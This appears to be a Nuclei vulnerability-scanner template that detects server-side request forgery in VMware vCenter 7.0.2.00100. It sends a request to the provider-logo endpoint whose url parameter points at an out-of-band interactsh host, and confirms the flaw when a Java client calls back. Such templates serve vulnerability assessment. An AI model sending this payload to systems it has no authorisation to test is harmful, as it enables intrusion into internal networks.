id: vmware-vcenter-ssrf

info:
  name: VMware vCenter - Server-Side Request Forgery/Local File Inclusion/Cross-Site Scripting
  author: pdteam
  severity: critical
  description: VMware vCenter 7.0.2.00100 is susceptible to multiple vulnerabilities including server-side request forgery, local file inclusion, and cross-site scripting.
  reference:
    - https://github.com/l0ggg/VMware_vCenter
  metadata:
    max-request: 1
  tags: ssrf,lfi,xss,oast,vcenter,vmware

http:
  - method: GET
    path:
      - "{{BaseURL}}/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=https://{{interactsh-url}}"

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: interactsh_request
        words:
          - "User-Agent: Java"

# digest: 4b0a00483046022100d5f12c18e01a09a213190d1851fc16971beb1798199b9833dba8aefb9e7a3a84022100abbd0732887781eea3db7d43d2003567b923483ae9d89dc87d7242bda1af3ce0:922c64590222798bb761d5b6d8e72950
